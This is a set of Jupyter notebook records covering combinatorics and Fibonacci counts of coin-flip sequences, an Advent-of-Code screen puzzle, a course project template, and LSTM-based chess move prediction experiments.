"# total number of trials\nN = 10\nlabels = {'0': \"heads\", '1': \"tails\"}\n\n# for converting an integer into a binary representation string:\nfmt = \"{:0\"+str(N)+\"b}\"\n\n# list all posibilities\narr = [fmt.format(n) for n in range(2**N)]\n# no cats next to one another:\narr = [st for st in arr if '00' not in st]\n\ndf = pd.DataFrame(dict(Arrangements = arr))\ndf.index += 1\ndisplay(df)\nprint(\"In total {} combinations.\".format(len(arr)))",
"_____no_output_____"
]
],
[
[
"## Label the Tabel of Options",
"_____no_output_____"
]
],
[
[
"# convert integer into a string sequence:\narrT = np.array([[labels.get(x) for x in st] for st in arr]).T\ndf = pd.DataFrame(dict([(k,v) for k,v in enumerate(arrT, start=1)]))\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"Count frequences and ratio",
"_____no_output_____"
]
],
[
[
"from collections import Counter\ncn = Counter()\n[cn.update(v) for v in arrT]\nprint(cn)\nheads = cn['heads']\ntails = cn['tails']\ntotal = heads+tails\n\nprint(\"Ratio heads/tails: {}\".format(heads/tails)) # 0.39285845418023574\nprint(\"heads: {:.2f}%\".format(100*heads/tails))\nprint(\"tails: {:.2f}%\".format(100*tails/tails))",
"Counter({'tails': 1020, 'heads': 420})\nRatio heads/tails: 0.4117647058823529\nheads: 41.18%\ntails: 100.00%\n"
]
],
[
[
"# Combinatorics\nIn this block we will calculate the number using combinatorics, e.g. using the [Stars and bars](https://en.wikipedia.org/wiki/Stars_and_bars_(combinatorics)) principle.\n\nLike for instance, if there was $t=7$ tails, there are $t-1=6$ gaps between them, one position at the left end, and one at the right end. These will be the $t+1=8$ positions where the $N-t=3$ tails can be placed.\n",
"_____no_output_____"
],
[
"So we are placing $N-t=3$ heads in $t+1=8$ positions. Since the order of the heads does not matter, there are \n${t+1 \\choose N-t} = {8 \\choose 3} = 56$ ways to choose the heads positions.\n\nThe table below shows the number of arrangements as a function of number of tails:\n",
"_____no_output_____"
]
],
[
[
"N = 10\n\n# function comb returns zero for illegal cases like (4 choose 6)\narr = [int(comb(t+1,N-t)) for t in range(0,N+1)]\n\ndf = pd.DataFrame({\"tails\": range(0,N+1), \"Arrangements\":arr, })\ndf.index = df['tails']\ndel df[\"tails\"]\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"Next, if we wanted to count the total number of all arrangements, we will sum over all the possible amounts of dogs $d \\in [{\\lfloor}N/2{\\rfloor}, N]$ which is given by the following formula:\n\n$\\sum_{d={\\lfloor}N/2{\\rfloor}}^N {d+1 \\choose N-d}$\n\nThe cell below calculates the total number of arrangements when $N=10$.\n",
"_____no_output_____"
]
],
[
[
"N = 10\nsum([int(comb(t+1,N-t)) for t in range(N+1)])",
"_____no_output_____"
]
],
[
[
"The answer $144$ is interesting, after realizing e.g. that $144=12^2$, one might start wondering what is the formula in a general case, e.g. what is the answer as a function of $N$.\n\nThe cell below calculates the answer when the number of animals when $1\\leq N \\leq 15$:",
"_____no_output_____"
]
],
[
[
"Ns = []\nSums = []\nfor N in range(1, 16):\n Ns.append(N)\n Sums.append(sum([int(comb(t+1,N-t)) for t in range(0,N+1)]))\n\ndf = pd.DataFrame()\ndf['Length'] = Ns\ndf['Combinations'] = Sums\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"## Fibonacci \n",
"_____no_output_____"
],
[
"# Solving the Recurrence Equation with Linear Algebra\nTo study further the appearing of the Fibonacci Sequence I chose to solve the recurrence problem using Linear Algebra.\nThe model is such that we mark the number of possible rows of outcomes where the last outcome is a tails with $t_n$, and likewise for rows with a heads at the end with $h_n$, a vector $v_n$ is formed by the two variables:\n\n$v_n = \\begin{bmatrix} t_n \\\\ h_n \\end{bmatrix}$\n\nThe initial value $v_0 = [1,1]^T$ tells that with a row of one animal there are mutual changes of the chosen animal being a heads or tails.\n\nTo build the recurrence, lets calculate the next $v_{n+1}$ in the sequence by:\n\n$v_{n+1} = \\begin{bmatrix} t_{n+1} \\\\ h_{n+1} \\end{bmatrix} = \n\\begin{bmatrix} 1 & 1 \\\\ 1 & 0 \\end{bmatrix} \\cdot\n\\begin{bmatrix} t_n \\\\ h_n \\end{bmatrix} = A \\cdot v_n\n$\n\nBecause both the rows ending with a heads or tails can be extended with a tails, are the top row values in the matrix $A$ both equal to 1. On the other hand, a row ending with a cat cannot be extended with another heads, which is indicated by the value 0 at the right bottom element of $A$.\n\nA general case of $v_n$ can therefore be calculated using matrix exponentation $A^n$ and the initial value $v_0$:\n\n$v_{n} = \\begin{bmatrix} t_{n} \\\\ h_{n} \\end{bmatrix} = \n\\begin{bmatrix} 1 & 1 \\\\ 1 & 0 \\end{bmatrix}^n \\cdot\n\\begin{bmatrix} t_0 \\\\ h_0 \\end{bmatrix} = A^n \\cdot v_0\n$\n\nThe number of rows ending with a heads or tails, and the total number of possible rows are calculated in the cell below for row lengths of $1 \\leq n \\leq 20$.\nThe table also shows the percentage of heads in the row and the number of valid rows compared to the total number of rows $2^N$:",
"_____no_output_____"
]
],
[
[
"A = np.array([[1,1],[1,0]])\nv = np.array([1,1]).T\n\nheads = []\ntails = []\nfor N in range(20):\n vn = matrix_power(A,N).dot(v)\n tails.append(vn[0])\n heads.append(vn[1])\n\ndf = pd.DataFrame()\ndf['heads'] = heads\ndf['tails'] = dogs\ndf['Total'] = df['heads']+df['tails']\ndf['heads/tails Ratio'] = df['tails']/df['heads']\ndf['tails percentage'] = 100*df['tails']/df['Total']\ndf['tails percentage'] = df.apply(lambda x: \"{:.3f}%\".format(x['tails percentage']), axis=1)\ndf.index += 1\n\ndf['Valid sequences'] = df.Total/(2**df.index)\ndf['Valid sequences'] = df.apply(lambda x: \"{:.3f}%\".format(100*x['Valid sequences']), axis=1)\n\ndisplay(df)",
"_____no_output_____"
]
],
[
[
"The above table shows that all three sequences follow the Fibonacci model, and the ratio of rows ending with a heads and rows ending with a tails approaches the Golden Ratio $\\phi = \\frac{1+\\sqrt{5}}{2}\\approx 1.618$.\n\nIt is the larger root of the characteristic polynomial:\n\n$\\phi^2−\\phi−1=0$.\n\nThe other root is $\\frac{1-\\sqrt{5}}{2} = -\\phi^{-1} = 1-\\phi \\approx -0.618$.\n\nThe constant $\\phi$ is also found in the [eigenvalue decomposition](https://www.wolframalpha.com/input/?i=%7B%7B1%2C1%7D%2C%7B1%2C0%7D%7D) of the matrix $A$:\n\n$\nA = C \\Lambda C^{-1} = \n\\begin{bmatrix} \\phi & 1-\\phi \\\\ 1 & 1 \\end{bmatrix} \\cdot\n\\begin{bmatrix} \\phi & 0 \\\\ 0 & 1-\\phi \\end{bmatrix} \\cdot\n\\begin{bmatrix} \\phi & 1-\\phi \\\\ 1 & 1 \\end{bmatrix}^{-1}\n$",
"_____no_output_____"
]
],
[
[
"L,C = np.linalg.eig(A)\nD=np.diag(L)\nprint(C)\nprint(D)\n\nprint((0.5+C.dot(D).dot(matrix_power(C,-1))).astype('int'))\nphi = (1+5**0.5)/2\nphi_2 = 1-phi\nC2 = np.array([[phi, phi_2], [1,1]])\nD2 = [[phi, 0], [0, phi_2]]\n# print((0.5+C2.dot(D2).dot(np.linalg.matrix_power(C2,-1))).astype('int'))",
"[[ 0.85065081 -0.52573111]\n [ 0.52573111 0.85065081]]\n[[ 1.61803399 0. ]\n [ 0. -0.61803399]]\n[[1 1]\n [1 0]]\n"
]
],
[
[
"## What value is the percentage of tails ~61.8%:\n\nIt is the ratio of two sequental Fibonacci numbers $F_{n-1}$ and $F_{n}$\n\n$\\lim_{n \\rightarrow \\infty} F_{n-1}/F_{n}$\n$ = \\phi^{-1} = \\phi -1 \\approx 0.618$ ",
"_____no_output_____"
]
],
[
[
"(phi**-1, phi-1)",
"_____no_output_____"
]
],
[
[
"### What value is the tails percentage ~38.2% ?\n\nIt is the ratio of two Fibonacci numbers $F_{n-2}$ and $F_{n}$\n\n$\\lim_{n \\rightarrow \\infty} F_{n-2}/F_{n}$\n$ = \\phi^{-2} = 1-\\phi^{-1} = 2-\\phi \\approx 0.382$ \n\nNice how these values can be written using so many different expressions!",
"_____no_output_____"
]
],
[
[
"(phi**-2, 1-phi**-1, 2-phi)",
"_____no_output_____"
]
],
[
[
"# case of more than two species\n\nWe can apply the method described above also for the cases where there are more than two species of animals. Like for instance in a case of four species the recurrency matrix $A$ could become:\n\n$A=\\begin{bmatrix} \n1 & 1 & 1 & 1 \\\\ \n1 & 0 & 1 & 1 \\\\ \n1 & 1 & 0 & 1 \\\\ \n1 & 1 & 1 & 0 \\\\ \n\\end{bmatrix}$\n\nIn this example matrix, similar rules apply as for the dogs and cats: you can put the first animal next to any other animal. The rest of species behaves like the cats in the example problem, you cannot put them next to one another.\n\nThe table below shows the results of the calculations with the number of species $2\\leq T \\leq 6$:",
"_____no_output_____"
]
],
[
[
"outcomes = []\nTs = []\nfor T in range(2,7):\n A = np.ones((T,T)) - np.identity(T)\n A[0,0] = 1\n v = np.array([1]*T).T\n res = []\n for N in range(12):\n vn = np.linalg.matrix_power(A,N).dot(v)\n res.append(int(sum(vn)))\n outcomes.append(res)\n Ts.append(T)\n\ndf = pd.DataFrame()\n\nprx = \"Number of outcome: \"\nfor i, arr in zip(Ts, outcomes):\n df[prx+str(i)] = arr\n prx = \"\"\ndf.index += 1\ndisplay(df)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7060df8ac62618ac2f4b606e344ccb8efe3177d | 3,867 | ipynb | Jupyter Notebook | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | Dec8.ipynb | dragonfyre13/adventofcode2016 | 61332b07d42569d9f0a225ee553b31e8f41b31f4 | [
"MIT"
] | null | null | null | 25.95302 | 101 | 0.385312 | [
[
[
"#!/usr/bin/env\nimport numpy, re\n\nclass BrokenScreen(object):\n def __init__(self, x, y):\n self.screen = numpy.zeros((x,y))\n \n def rect(self, x, y):\n self.screen[0:y,0:x] = 1\n \n def rotate_column(self, x, by):\n self.screen[0:,x] = numpy.roll(self.screen[0:,x], by)\n \n def rotate_row(self, y, by):\n self.screen[y, 0:] = numpy.roll(self.screen[y, 0:], by)\n \n def cmd(self, input_str):\n m = re.match('rect (\\d+)x(\\d+)', input_str)\n if m:\n self.rect(int(m.group(1)), int(m.group(2)))\n return\n m = re.match('rotate (?:row|column) y=(\\d+) by (\\d+)', input_str)\n if m:\n self.rotate_row(int(m.group(1)), int(m.group(2)))\n return\n m = re.match('rotate (?:row|column) x=(\\d+) by (\\d+)', input_str)\n if m:\n self.rotate_column(int(m.group(1)), int(m.group(2)))\n return\n print \"UNKNOWN COMMAND\", input_str\n\n def __str__(self):\n return '\\n'.join([''.join([('#' if e else '.') for e in row]) for row in self.screen])",
"_____no_output_____"
],
[
"scr = BrokenScreen(3,7)\nprint str(scr)\nprint \"rect 3x2\"\nscr.cmd(\"rect 3x2\")\nprint str(scr)\nprint \"rotate column x=1 by 1\"\nscr.cmd(\"rotate column x=1 by 1\")\nprint str(scr)\nprint \"rotate row y=0 by 4\"\nscr.cmd(\"rotate row y=0 by 4\")\nprint str(scr)\nprint \"rotate row x=1 by 1\"\nscr.cmd(\"rotate row x=1 by 1\")\nprint str(scr)",
".......\n.......\n.......\nrect 3x2\n###....\n###....\n.......\nrotate column x=1 by 1\n#.#....\n###....\n.#.....\nrotate row y=0 by 4\n....#.#\n###....\n.#.....\nrotate row x=1 by 1\n.#..#.#\n#.#....\n.#.....\n"
],
[
"scr = BrokenScreen(6,50)\nwith open('Dec8.input', 'r') as f:\n for line in f:\n scr.cmd(line)\nprint scr.screen.sum()\nprint scr",
"110.0\n####...##.#..#.###..#..#..##..###..#....#...#..##.\n...#....#.#..#.#..#.#.#..#..#.#..#.#....#...#...#.\n..#.....#.####.#..#.##...#....#..#.#.....#.#....#.\n.#......#.#..#.###..#.#..#....###..#......#.....#.\n#....#..#.#..#.#.#..#.#..#..#.#....#......#..#..#.\n####..##..#..#.#..#.#..#..##..#....####...#...##..\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
e706120425ecff7e8556b9fe8da9ae8e1e719581 | 3,924 | ipynb | Jupyter Notebook | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | 1 | 2021-08-25T13:02:15.000Z | 2021-08-25T13:02:15.000Z | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | null | null | null | content/courseware/final-project-template.ipynb | nfeldl/ClimateLaboratoryBook | 05eb0395c0e07d3724e6569e160fbefc9829a990 | [
"CC-BY-4.0"
] | 2 | 2021-07-21T20:43:20.000Z | 2021-08-25T13:02:16.000Z | 25.986755 | 392 | 0.598879 | [
[
[
"# Your Final Project Title Goes Here",
"_____no_output_____"
],
[
"## Your Name Here",
"_____no_output_____"
],
[
"5 points for on-time submission of project proposal",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the introduction you will (i) describe your broad topic of wide relevance or interest and (ii) provide a concrete statement of the scientific question explored or hypothesis tested. I recommend starting broad and narrowing down to the specifics of your project.\n\nIt is not required to provide citations to scientific literature, though you may if you used outside resources.\n\n15 points.",
"_____no_output_____"
],
[
"## Methods",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the methods, you will detail your methodology. Make sure to describe **in words** which model you used, why you used it, and, if applicable, how you configured it. If using pre-generated model output (e.g., CESM) also describe the climate fields that you will be inspecting. **In this section, you will include the code to build the model or load the model output.**\n\n15 points.",
"_____no_output_____"
],
[
"## Results",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the results, you will show your original calculations. Include all the code necessary to generate your results, and clearly communicate your results as well-labeled figures and tables as appropriate. Your work must be completely reproducible (i.e., the instructor must be able to run the Jupyter notebook cleanly from start to finish).\n\nThe expected format is a mix of code cells, Markdown (text) cells, and products (figures, tables, etc.). You may add subsections to organize your results section if desired.\n\n50 points total.",
"_____no_output_____"
],
[
"## Conclusions",
"_____no_output_____"
],
[
"*Delete this cell before turning in your final project.*\n\nInstructions: In the conclusions, you will provide a summary of what you learned. Make sure that your conclusions are supported by the results and that you discuss limitations and implications.\n\n15 points.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e706235b69b129fa8d2aa7f61033f003f9a29d51 | 405,164 | ipynb | Jupyter Notebook | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | feature_engineering_functions/ysign feature eng functions.ipynb | KeaganHRankin/1498-ML-Project | 3f8520961642ab9a4a746a97e947c0808248672f | [
"MIT"
] | null | null | null | 518.112532 | 378,860 | 0.930492 | [
[
[
"### Feature Engineering and Data Processing: Y-SIGN data 2022-03\nThis file is for R&D of features for the model. Features should be created using functions that can then be cut and paste into the model_functions.py file to be imported into the final model .ipynb file.\n\nWe should split our data before we do any of this! (before splitting, need expand the intersections data to every road, or just use the direct adjacant values).",
"_____no_output_____"
]
],
[
[
"# Import 3rd party libraries\nimport os\nimport json\nimport requests\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\n\n# Configure Notebook\n%matplotlib inline\nplt.style.use('dark_background')\n#plt.style.use('ggplot')\nsns.set_context(\"notebook\")\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
]
],
[
[
"#### Import the train data (LTS data + intersections, neighbourhoods ...)",
"_____no_output_____"
],
[
"#### Data Processing",
"_____no_output_____"
],
[
"Import the data",
"_____no_output_____"
]
],
[
[
"train_data = pd.read_csv('C:/Users/Keagan Rankin/Documents/PycharmProj/data/training_data/ysign_dropoff2_iter15_train.csv')\ntrain_data.head()",
"_____no_output_____"
],
[
"train_data['ysign vehicle'].quantile(0.75)",
"_____no_output_____"
]
],
[
[
"Create a function that drops outliers in the ysign data, <br>\nWe don't want to remove outliers based on YSIGN, but instead outliers should be removed during data cleaning before the test train split (based on the overall 8 hour peak) <br>\nEven then, we don't really want to discount any measurements as these are \"peaks\" over time. lets not remove outliers <br>\nWe can however remove all the rows we don't want",
"_____no_output_____"
]
],
[
[
"def droprows(data, keep):\n \"\"\"\n Function drops rows that are not passed in 'keep' list.\n \"\"\"\n \n #Drop\n data_drop = data[keep]\n \n return data_drop\n\nkeep_rows = ['OBJECTID', 'GEO_ID',\n 'LTS',\t'geometry',\t'ysign vehicle', \n 'ysign ped', 'high access']\n\ntrain_data = ysign_droprows(train_data, keep_rows)\ntrain_data.head()",
"_____no_output_____"
]
],
[
[
"We also suspect that there is a geospatial relationship for LTS. If we do PCA like in assignment 7 in the centroids of the centrelines, <br>\nand then dummy encode regions in toronto along the principle components, we can use this as a feature.",
"_____no_output_____"
]
],
[
[
"from shapely import wkt",
"_____no_output_____"
],
[
"from sklearn.decomposition import PCA\ndef add_regions(data, components, bins):\n \"\"\"\n function extract PC of Toronto's geometry and bins it into a # of regions.\n \n takes: in data, # of components, and # of bins.\n returns: the training data with x_regions and y_regions labels for dummy encoding.\n \"\"\"\n # Extract the centroids of the LINESTRING geometry.\n # Also return the x y components of these centroids\n data_g = data.copy()\n data_g['geometry'] = data_g['geometry'].apply(wkt.loads)\n train_data_gpd = gpd.GeoDataFrame(data_g, crs=\"EPSG:26917\")\n train_data_gpd.head()\n \n centroids = train_data_gpd['geometry'].centroid\n centroids_df = pd.DataFrame(data={'x':centroids.x, 'y':centroids.y})\n \n # Scale features.\n scaler = StandardScaler().fit(centroids_df)\n X_scaled = scaler.transform(centroids_df)\n \n # Create/fit PCA function.\n pca = PCA(n_components=components)\n X_transformed = pca.fit_transform(X_scaled)\n X_transformed_df = pd.DataFrame(X_transformed)\n \n # Print results.\n for i in range(components):\n print('Principal component', i)\n print('explains', (pca.explained_variance_ratio_[i] * 100), '% of the variance in \"lon\" and \"lat\".')\n \n # Return inversed values\n X_new = pca.inverse_transform(X_transformed)\n X_new = scaler.inverse_transform(X_new)\n X_new_df = pd.DataFrame(X_new)\n \n # Bin geographic regions based on components\n out = pd.qcut(X_transformed_df[0], bins, labels=np.arange(1,bins+1,1))\n out2 = pd.qcut(X_transformed_df[1], bins, labels=np.arange(1,bins+1,1)) \n \n #Append the bin labels to the geo data.\n data_g['x_region'] = out\n data_g['y_region'] = out2\n \n #return X_transformed_df, centroids_df\n return data_g\n \n#pcs, geo_points = add_regions(train_data, 2, 5)\ntrain_data = add_regions(train_data, 2, 6)",
"Principal component 0\nexplains 74.76311274393491 % of the variance in \"lon\" and \"lat\".\nPrincipal component 1\nexplains 25.236887256065092 % of the variance in \"lon\" and \"lat\".\n"
],
[
"plotr = gpd.GeoDataFrame(train_data, crs=\"EPSG:26917\")\n#plotr['newlab'] = plotr['x_region'] / plotr['y_region']\n\nfig, ax = plt.subplots(1,2, figsize=(16,8))\nplotr.plot(ax=ax[0], column='x_region')\nplotr.plot(ax=ax[1], column='y_region')",
"_____no_output_____"
]
],
[
[
"Define a function that scales all numerical features and dummy encodes all categorical features",
"_____no_output_____"
]
],
[
[
"from sklearn.preprocessing import StandardScaler\ndef scale_and_dummy(data, scale_feats, dummy_feats):\n \"\"\"\n Scales the passed columns of data.\n Dummy encode categorical features passed\n \"\"\"\n \n # Create scaler\n scaler = StandardScaler()\n scaler.fit(data[scale_feats])\n \n scaled = data[scale_feats].copy()\n \n # Convert numeric features to standard units\n scaled = scaler.transform(scaled)\n data[scale_feats] = scaled\n \n # Convert categorical features using dummy encoding. \n #Drop the encoded features from the frame.\n for s in dummy_feats:\n categorical = pd.get_dummies(data[s], prefix=s, drop_first=True)\n data = pd.concat((data, categorical), axis=1)\n \n data = data.drop(dummy_feats, axis=1)\n \n return data\n \ntrain_data = scale_and_dummy(train_data, ['ysign vehicle', 'ysign ped'], ['x_region', 'y_region'])",
"_____no_output_____"
],
[
"train_data.head()",
"_____no_output_____"
]
],
[
[
"#### Advanced cross validation\nWe may want to do an advanced, spatial cross validation due to the nature of the data.<br>\ncreate a function that performs this cross val",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e7062a6443581635d3d65d6d128bf7750261d11d | 31,949 | ipynb | Jupyter Notebook | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | null | null | null | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | 19 | 2020-12-29T20:39:08.000Z | 2021-04-09T18:11:43.000Z | notebooks/20200512 - Transformers model.ipynb | TheoLvs/beth | 7331f899a020013ff3bcd0bbdf8b13f1ad173369 | [
"MIT"
] | null | null | null | 28.198588 | 1,493 | 0.531222 | [
[
[
"# Base Data Science snippet\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport time\nfrom tqdm import tqdm_notebook\n\n%matplotlib inline\n%load_ext autoreload\n%autoreload 2\n\nfrom comet_ml import Experiment",
"The autoreload extension is already loaded. To reload it, use:\n %reload_ext autoreload\n"
]
],
[
[
"##### TODO\n- Test the ``chess`` library\n - Convert to numpy array\n - Gif \n- Use pre-existing GameAI\n- Create GameAI with minimax techniques\n- Evaluation function for each move\n- Move recommendation \"à la\" AlphaGo, MCTS ?\n- Notebook interface to play\n- Adaptive GameAI\n\n",
"_____no_output_____"
]
],
[
[
"import sys\nsys.path.append(\"../\")\n\nfrom beth.game import Game\nfrom beth.players.random_player import RandomPlayer\nfrom beth.players.human_player import HumanPlayer\nfrom beth.players.sequence import SequenceGame,SequencePlayer",
"_____no_output_____"
]
],
[
[
"# Playground",
"_____no_output_____"
]
],
[
[
"black = RandomPlayer()\nwhite = RandomPlayer()\n\n# white = HumanPlayer()\n# black = HumanPlayer()\n\ngame = Game(white,black)",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
],
[
"game.reset_game()\ngame.run()",
"_____no_output_____"
],
[
"game.board.is_seventyfive_moves()",
"_____no_output_____"
]
],
[
[
"# Game exploration",
"_____no_output_____"
]
],
[
[
"games = pd.read_csv(\"../data/raw/kaggle/games.csv\")",
"_____no_output_____"
],
[
"games.shape",
"_____no_output_____"
],
[
"\"start \" + games[\"moves\"].head()",
"_____no_output_____"
],
[
"game = games.iloc[2]\n\nseq_str = game[\"moves\"]\nwinner = game[\"winner\"]\nvictory_status = game[\"victory_status\"]",
"_____no_output_____"
],
[
"seq = SequenceGame(seq_str,0.1,victory_status,winner)\ngame = Game(seq.white,seq.black)\nseq_str",
"_____no_output_____"
],
[
"seq.victory_status",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
]
],
[
[
"https://pytorch.org/tutorials/beginner/transformer_tutorial.html",
"_____no_output_____"
],
[
"# Experiment 1 using LSTMs\nhttps://www.kdnuggets.com/2020/07/pytorch-lstm-text-generation-tutorial.html",
"_____no_output_____"
]
],
[
[
"from beth.models.dataset import Dataset\nfrom beth.utils import make_experiment\nfrom beth.models.lstm import LSTMModel\nfrom beth.players.ai_player import AIPlayer",
"_____no_output_____"
]
],
[
[
"## Init classes",
"_____no_output_____"
]
],
[
[
"games = pd.read_csv(\"../data/raw/kaggle/games.csv\")\nmoves = \"start \" + games[\"moves\"]\nmoves.head()",
"_____no_output_____"
],
[
"moves[0]",
"_____no_output_____"
],
[
"dataset = Dataset(moves)",
"_____no_output_____"
],
[
"len(dataset.uniq_words)",
"_____no_output_____"
]
],
[
[
"## Train loop",
"_____no_output_____"
]
],
[
[
"experiment = make_experiment(\"../.env\",\"Simple LSTM\",[\"NLP\",\"LSTM\"])",
"COMET INFO: Experiment is live on comet.ml https://www.comet.ml/theolvs/beth/2f28f4cbecb646179c6a3d4a0ca2b444\n\n"
],
[
"params = {\n \"sequence_length\":10,\n \"batch_size\":32,\n \"max_epochs\":1,\n \"lr\":0.01,\n \"lstm_size\":128,\n \"embedding_dim\":128,\n \"num_layers\":3,\n}",
"_____no_output_____"
],
[
"model = LSTMModel(dataset,**params)",
"_____no_output_____"
],
[
"experiment.log_parameters(params)\nmodel.fit(**params)\n# experiment.end()",
"_____no_output_____"
],
[
"model.save_weights(\"lstm_20122020.pth\")",
"_____no_output_____"
],
[
"experiment.log_text(\"Learning rate does not seem to accelerate anything here, let's stick to around 0.001\")",
"_____no_output_____"
],
[
"experiment.end()",
"COMET INFO: ---------------------------\nCOMET INFO: Comet.ml Experiment Summary\nCOMET INFO: ---------------------------\nCOMET INFO: Data:\nCOMET INFO: display_summary_level : 1\nCOMET INFO: url : https://www.comet.ml/theolvs/beth/2f28f4cbecb646179c6a3d4a0ca2b444\nCOMET INFO: Metrics [count] (min, max):\nCOMET INFO: loss [1242] : (3.267238140106201, 8.412087440490723)\nCOMET INFO: Others:\nCOMET INFO: Name : Simple LSTM\nCOMET INFO: Parameters:\nCOMET INFO: batch_size : 32\nCOMET INFO: embedding_dim : 128\nCOMET INFO: lr : 0.01\nCOMET INFO: lstm_size : 128\nCOMET INFO: max_epochs : 1\nCOMET INFO: num_layers : 3\nCOMET INFO: sequence_length : 10\nCOMET INFO: Uploads:\nCOMET INFO: code : 1 (3 KB)\nCOMET INFO: environment details : 1\nCOMET INFO: filename : 1\nCOMET INFO: git metadata : 1\nCOMET INFO: git-patch (uncompressed) : 1 (14 MB)\nCOMET INFO: installed packages : 1\nCOMET INFO: model graph : 1\nCOMET INFO: notebook : 1\nCOMET INFO: text-sample : 1\nCOMET INFO: ---------------------------\nCOMET INFO: Still uploading\n"
],
[
"p = model.predict(\"start\",1,as_proba = True)",
"_____no_output_____"
],
[
"p",
"_____no_output_____"
],
[
"p[0].sort_values(ascending = False).head(10)",
"_____no_output_____"
]
],
[
[
"## Test in games",
"_____no_output_____"
]
],
[
[
"model = LSTMModel(dataset)",
"_____no_output_____"
],
[
"model.load_weights(\"lstm_20122020.pth\")",
"_____no_output_____"
],
[
"# black = RandomPlayer()\n# white = RandomPlayer()\n\nwhite = AIPlayer(brain=model)\n# black = AIPlayer(brain=model)\n\n# white = HumanPlayer()\nblack = HumanPlayer()\n\ngame = Game(white,black)",
"_____no_output_____"
],
[
"game.run()",
"_____no_output_____"
],
[
"p = model.predict_next(game)[0]",
"_____no_output_____"
],
[
"p.loc[game.get_legal_moves_san()].sort_values(ascending = False)",
"_____no_output_____"
],
[
"stack[0]",
"_____no_output_____"
],
[
"x = stack[0]",
"_____no_output_____"
],
[
"game.board.san(stack[1])",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7062ca1131d88ba283e7b7fe072f3d54206b8bb | 1,593 | ipynb | Jupyter Notebook | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | 1 | 2021-08-17T15:16:11.000Z | 2021-08-17T15:16:11.000Z | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | null | null | null | miml.ipynb | ccha23/miml | 6a41de1c0bb41d38e3cdc6e9c27363215b7729b9 | [
"MIT"
] | null | null | null | 36.204545 | 572 | 0.694915 | [
[
[
"# Mutual Information in Machine Learning",
"_____no_output_____"
],
[
